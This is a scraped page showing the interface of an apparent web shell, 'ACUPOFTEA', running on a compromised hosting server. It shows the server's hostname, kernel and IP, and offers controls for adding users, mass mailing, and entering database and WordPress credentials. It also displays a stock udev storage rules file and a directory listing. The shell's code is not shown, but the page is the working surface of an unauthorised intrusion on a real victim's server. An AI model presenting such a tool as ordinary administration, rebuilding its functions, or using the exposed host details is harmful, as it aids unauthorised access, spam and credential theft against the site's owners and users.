System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
udev
/
rules.d
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
60-persistent-storage.rules
# do not edit this file, it will be overwritten on update # persistent storage links: /dev/disk/{by-id,by-uuid,by-label,by-path} # scheme based on "Linux persistent device names", 2004, Hannes Reinecke <hare@suse.de> ACTION=="remove", GOTO="persistent_storage_end" ENV{UDEV_DISABLE_PERSISTENT_STORAGE_RULES_FLAG}=="1", GOTO="persistent_storage_end" SUBSYSTEM!="block", GOTO="persistent_storage_end" KERNEL!="loop*|mmcblk*[0-9]|msblk*[0-9]|mspblk*[0-9]|nvme*|sd*|sr*|vd*|xvd*|bcache*|cciss*|dasd*|ubd*|scm*|pmem*|nbd*", GOTO="persistent_storage_end" # ignore partitions that span the entire disk TEST=="whole_disk", GOTO="persistent_storage_end" # for partitions import parent information ENV{DEVTYPE}=="partition", IMPORT{parent}="ID_*" # NVMe KERNEL=="nvme*[0-9]n*[0-9]", ATTR{wwid}=="?*", SYMLINK+="disk/by-id/nvme-$attr{wwid}" KERNEL=="nvme*[0-9]n*[0-9]p*[0-9]", ENV{DEVTYPE}=="partition", ATTRS{wwid}=="?*", SYMLINK+="disk/by-id/nvme-$attr{wwid}-part%n" KERNEL=="nvme*[0-9]n*[0-9]", ENV{DEVTYPE}=="disk", ATTRS{serial}=="?*", ENV{ID_SERIAL_SHORT}="$attr{serial}" KERNEL=="nvme*[0-9]n*[0-9]", ENV{DEVTYPE}=="disk", ATTRS{wwid}=="?*", ENV{ID_WWN}="$attr{wwid}" KERNEL=="nvme*[0-9]n*[0-9]", ENV{DEVTYPE}=="disk", ATTRS{model}=="?*", ENV{ID_MODEL}="$attr{model}" KERNEL=="nvme*[0-9]n*[0-9]", ENV{DEVTYPE}=="disk", ENV{ID_MODEL}=="?*", ENV{ID_SERIAL_SHORT}=="?*", \ ENV{ID_SERIAL}="$env{ID_MODEL}_$env{ID_SERIAL_SHORT}", SYMLINK+="disk/by-id/nvme-$env{ID_SERIAL}" KERNEL=="nvme*[0-9]n*[0-9]p*[0-9]", ENV{DEVTYPE}=="partition", ATTRS{serial}=="?*", ENV{ID_SERIAL_SHORT}="$attr{serial}" KERNEL=="nvme*[0-9]n*[0-9]p*[0-9]", ENV{DEVTYPE}=="partition", ATTRS{model}=="?*", ENV{ID_MODEL}="$attr{model}" KERNEL=="nvme*[0-9]n*[0-9]p*[0-9]", ENV{DEVTYPE}=="partition", ENV{ID_MODEL}=="?*", ENV{ID_SERIAL_SHORT}=="?*", \ ENV{ID_SERIAL}="$env{ID_MODEL}_$env{ID_SERIAL_SHORT}", SYMLINK+="disk/by-id/nvme-$env{ID_SERIAL}-part%n" # virtio-blk KERNEL=="vd*[!0-9]", ATTRS{serial}=="?*", ENV{ID_SERIAL}="$attr{serial}", SYMLINK+="disk/by-id/virtio-$env{ID_SERIAL}" KERNEL=="vd*[0-9]", ATTRS{serial}=="?*", ENV{ID_SERIAL}="$attr{serial}", SYMLINK+="disk/by-id/virtio-$env{ID_SERIAL}-part%n" # ATA KERNEL=="sd*[!0-9]|sr*", ENV{ID_SERIAL}!="?*", SUBSYSTEMS=="scsi", ATTRS{vendor}=="ATA", IMPORT{program}="ata_id --export $devnode" # ATAPI devices (SPC-3 or later) KERNEL=="sd*[!0-9]|sr*", ENV{ID_SERIAL}!="?*", SUBSYSTEMS=="scsi", ATTRS{type}=="5", ATTRS{scsi_level}=="[6-9]*", IMPORT{program}="ata_id --export $devnode" # Run ata_id on non-removable USB Mass Storage (SATA/PATA disks in enclosures) KERNEL=="sd*[!0-9]|sr*", ENV{ID_SERIAL}!="?*", ATTR{removable}=="0", SUBSYSTEMS=="usb", IMPORT{program}="ata_id --export $devnode" # Fall back usb_id for USB devices KERNEL=="sd*[!0-9]|sr*", ENV{ID_SERIAL}!="?*", SUBSYSTEMS=="usb", IMPORT{builtin}="usb_id" # SCSI devices KERNEL=="sd*[!0-9]|sr*", ENV{ID_SERIAL}!="?*", IMPORT{program}="scsi_id --export --whitelisted -d $devnode", ENV{ID_BUS}="scsi" KERNEL=="cciss*", ENV{DEVTYPE}=="disk", ENV{ID_SERIAL}!="?*", IMPORT{program}="scsi_id --export --whitelisted -d $devnode", ENV{ID_BUS}="cciss" KERNEL=="sd*|sr*|cciss*", ENV{DEVTYPE}=="disk", ENV{ID_SERIAL}=="?*", SYMLINK+="disk/by-id/$env{ID_BUS}-$env{ID_SERIAL}" KERNEL=="sd*|cciss*", ENV{DEVTYPE}=="partition", ENV{ID_SERIAL}=="?*", SYMLINK+="disk/by-id/$env{ID_BUS}-$env{ID_SERIAL}-part%n" # FireWire KERNEL=="sd*[!0-9]|sr*", ATTRS{ieee1394_id}=="?*", SYMLINK+="disk/by-id/ieee1394-$attr{ieee1394_id}" KERNEL=="sd*[0-9]", ATTRS{ieee1394_id}=="?*", SYMLINK+="disk/by-id/ieee1394-$attr{ieee1394_id}-part%n" # MMC KERNEL=="mmcblk[0-9]", SUBSYSTEMS=="mmc", ATTRS{name}=="?*", ATTRS{serial}=="?*", \ ENV{ID_NAME}="$attr{name}", ENV{ID_SERIAL}="$attr{serial}", SYMLINK+="disk/by-id/mmc-$env{ID_NAME}_$env{ID_SERIAL}" KERNEL=="mmcblk[0-9]p[0-9]*", ENV{ID_NAME}=="?*", ENV{ID_SERIAL}=="?*", SYMLINK+="disk/by-id/mmc-$env{ID_NAME}_$env{ID_SERIAL}-part%n" # UBI-MTD SUBSYSTEM=="ubi", KERNEL=="ubi*_*", ATTRS{mtd_num}=="*", SYMLINK+="ubi_mtd%s{mtd_num}_%s{name}" # Memstick KERNEL=="msblk[0-9]|mspblk[0-9]", SUBSYSTEMS=="memstick", ATTRS{name}=="?*", ATTRS{serial}=="?*", \ ENV{ID_NAME}="$attr{name}", ENV{ID_SERIAL}="$attr{serial}", SYMLINK+="disk/by-id/memstick-$env{ID_NAME}_$env{ID_SERIAL}" KERNEL=="msblk[0-9]p[0-9]|mspblk[0-9]p[0-9]", ENV{ID_NAME}=="?*", ENV{ID_SERIAL}=="?*", SYMLINK+="disk/by-id/memstick-$env{ID_NAME}_$env{ID_SERIAL}-part%n" # by-path ENV{DEVTYPE}=="disk", DEVPATH!="*/virtual/*", IMPORT{builtin}="path_id" KERNEL=="mmcblk[0-9]boot[0-9]", ENV{DEVTYPE}=="disk", ENV{ID_PATH}=="?*", SYMLINK+="disk/by-path/$env{ID_PATH}-boot%n" KERNEL!="mmcblk[0-9]boot[0-9]", ENV{DEVTYPE}=="disk", ENV{ID_PATH}=="?*", SYMLINK+="disk/by-path/$env{ID_PATH}" ENV{DEVTYPE}=="partition", ENV{ID_PATH}=="?*", SYMLINK+="disk/by-path/$env{ID_PATH}-part%n" # legacy virtio-pci by-path links (deprecated) KERNEL=="vd*[!0-9]", ENV{ID_PATH}=="pci-*", SYMLINK+="disk/by-path/virtio-$env{ID_PATH}" KERNEL=="vd*[0-9]", ENV{ID_PATH}=="pci-*", SYMLINK+="disk/by-path/virtio-$env{ID_PATH}-part%n" # probe filesystem metadata of optical drives which have a media inserted KERNEL=="sr*", ENV{DISK_EJECT_REQUEST}!="?*", ENV{ID_CDROM_MEDIA_TRACK_COUNT_DATA}=="?*", ENV{ID_CDROM_MEDIA_SESSION_LAST_OFFSET}=="?*", \ IMPORT{builtin}="blkid --offset=$env{ID_CDROM_MEDIA_SESSION_LAST_OFFSET}" # single-session CDs do not have ID_CDROM_MEDIA_SESSION_LAST_OFFSET KERNEL=="sr*", ENV{DISK_EJECT_REQUEST}!="?*", ENV{ID_CDROM_MEDIA_TRACK_COUNT_DATA}=="?*", ENV{ID_CDROM_MEDIA_SESSION_LAST_OFFSET}=="", \ IMPORT{builtin}="blkid --noraid" # probe filesystem metadata of disks KERNEL!="sr*", IMPORT{builtin}="blkid" # by-label/by-uuid links (filesystem metadata) ENV{ID_FS_USAGE}=="filesystem|other|crypto", ENV{ID_FS_UUID_ENC}=="?*", SYMLINK+="disk/by-uuid/$env{ID_FS_UUID_ENC}" ENV{ID_FS_USAGE}=="filesystem|other|crypto", ENV{ID_FS_LABEL_ENC}=="?*", SYMLINK+="disk/by-label/$env{ID_FS_LABEL_ENC}" # by-id (World Wide Name) ENV{DEVTYPE}=="disk", ENV{ID_WWN_WITH_EXTENSION}=="?*", SYMLINK+="disk/by-id/wwn-$env{ID_WWN_WITH_EXTENSION}" ENV{DEVTYPE}=="partition", ENV{ID_WWN_WITH_EXTENSION}=="?*", SYMLINK+="disk/by-id/wwn-$env{ID_WWN_WITH_EXTENSION}-part%n" # by-partlabel/by-partuuid links (partition metadata) ENV{ID_PART_ENTRY_UUID}=="?*", SYMLINK+="disk/by-partuuid/$env{ID_PART_ENTRY_UUID}" ENV{ID_PART_ENTRY_SCHEME}=="gpt", ENV{ID_PART_ENTRY_NAME}=="?*", SYMLINK+="disk/by-partlabel/$env{ID_PART_ENTRY_NAME}" LABEL="persistent_storage_end"
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
..
DIR
-
drwxr-xr-x
2025-04-23 10:58:40
10-dm.rules
text/plain
7.1 KB
-r--r--r--
2025-07-15 09:03:10
11-dm-parts.rules
text/plain
1.41 KB
-rw-r--r--
2025-04-22 01:55:39
13-dm-disk.rules
text/plain
1.75 KB
-r--r--r--
2025-07-15 09:03:10
40-elevator.rules
text/plain
728 B
-rw-r--r--
2025-04-22 01:57:50
40-redhat.rules
text/plain
1.79 KB
-rw-r--r--
2025-04-22 01:57:53
40-usb-blacklist.rules
text/plain
457 B
-rw-r--r--
2022-10-08 10:09:12
50-udev-default.rules
text/plain
3.66 KB
-rw-r--r--
2025-04-22 01:58:19
60-alias-kmsg.rules
text/plain
357 B
-rw-r--r--
2025-04-22 01:57:55
60-block.rules
text/plain
626 B
-rw-r--r--
2025-04-22 01:57:50
60-cdrom_id.rules
text/plain
1.05 KB
-rw-r--r--
2018-06-22 11:11:49
60-drm.rules
text/plain
413 B
-rw-r--r--
2018-06-22 11:11:49
60-evdev.rules
text/plain
974 B
-rw-r--r--
2018-06-22 11:11:49
60-fido-id.rules
text/plain
165 B
-rw-r--r--
2025-04-22 01:57:54
60-input-id.rules
text/plain
282 B
-rw-r--r--
2018-06-22 11:11:49
60-net.rules
text/plain
129 B
-rw-r--r--
2022-08-10 01:03:37
60-persistent-alsa.rules
text/plain
616 B
-rw-r--r--
2018-06-22 11:11:49
60-persistent-input.rules
text/plain
2.65 KB
-rw-r--r--
2018-06-22 11:11:49
60-persistent-storage-tape.rules
text/plain
1.61 KB
-rw-r--r--
2025-04-22 01:57:57
60-persistent-storage.rules
text/plain
6.38 KB
-rw-r--r--
2018-06-22 11:11:49
60-persistent-v4l.rules
text/plain
769 B
-rw-r--r--
2018-06-22 11:11:49
60-raw.rules
text/plain
326 B
-rw-r--r--
2024-04-06 01:02:51
60-sensor.rules
text/plain
727 B
-rw-r--r--
2018-06-22 11:11:49
60-serial.rules
text/plain
1.16 KB
-rw-r--r--
2018-06-22 11:11:49
60-tpm-udev.rules
text/plain
211 B
-rw-r--r--
2019-10-17 03:56:47
61-scsi-sg3_id.rules
text/plain
4.67 KB
-rw-r--r--
2017-09-18 07:15:01
63-fc-wwpn-id.rules
text/plain
624 B
-rw-r--r--
2022-10-08 10:09:12
63-scsi-sg3_symlink.rules
text/plain
2.82 KB
-rw-r--r--
2015-10-29 08:52:08
64-btrfs.rules
text/plain
616 B
-rw-r--r--
2025-04-22 01:58:19
66-kpartx.rules
text/plain
1.12 KB
-rw-r--r--
2025-04-22 01:55:39
68-del-part-nodes.rules
text/plain
1.12 KB
-rw-r--r--
2025-04-22 01:55:39
70-joystick.rules
text/plain
432 B
-rw-r--r--
2018-06-22 11:11:49
70-mouse.rules
text/plain
734 B
-rw-r--r--
2018-06-22 11:11:49
70-power-switch.rules
text/plain
568 B
-rw-r--r--
2018-06-22 11:11:49
70-touchpad.rules
text/plain
473 B
-rw-r--r--
2018-06-22 11:11:49
70-uaccess.rules
text/plain
2.61 KB
-rw-r--r--
2018-06-22 11:11:49
71-biosdevname.rules
text/plain
995 B
-rw-r--r--
2019-10-18 08:07:58
71-prefixdevname.rules
text/plain
403 B
-rw-r--r--
2019-12-16 07:52:15
71-seat.rules
text/plain
2.69 KB
-rw-r--r--
2025-04-22 01:58:19
73-idrac.rules
text/plain
316 B
-rw-r--r--
2025-04-22 01:57:49
73-seat-late.rules
text/plain
636 B
-rw-r--r--
2025-04-22 01:58:24
75-net-description.rules
text/plain
452 B
-rw-r--r--
2018-06-22 11:11:49
75-probe_mtd.rules
text/plain
174 B
-rw-r--r--
2018-06-22 11:11:49
78-sound-card.rules
text/plain
4.7 KB
-rw-r--r--
2018-06-22 11:11:49
80-drivers.rules
text/plain
615 B
-rw-r--r--
2018-06-22 11:11:49
80-net-setup-link.rules
text/plain
292 B
-rw-r--r--
2018-06-22 11:11:49
84-nm-drivers.rules
text/plain
533 B
-rw-r--r--
2022-10-10 01:57:58
85-nm-unmanaged.rules
text/plain
1.97 KB
-rw-r--r--
2022-10-11 07:42:01
90-iprutils.rules
text/plain
70 B
-rw-r--r--
2020-05-08 02:19:42
90-nm-thunderbolt.rules
text/plain
588 B
-rw-r--r--
2022-10-10 01:57:58
90-vconsole.rules
text/plain
510 B
-rw-r--r--
2025-04-22 01:58:19
95-dm-notify.rules
text/plain
483 B
-r--r--r--
2025-07-15 09:03:10
98-kexec.rules
text/plain
695 B
-rw-r--r--
2024-09-24 08:36:00
99-nfs.rules
text/plain
95 B
-rw-r--r--
2025-06-04 10:53:59
99-qemu-guest-agent.rules
text/plain
130 B
-rw-r--r--
2025-08-07 12:04:07
99-systemd.rules
text/plain
4.26 KB
-rw-r--r--
2025-04-22 01:58:19
~ ACUPOFTEA - mail.ontime-ae.com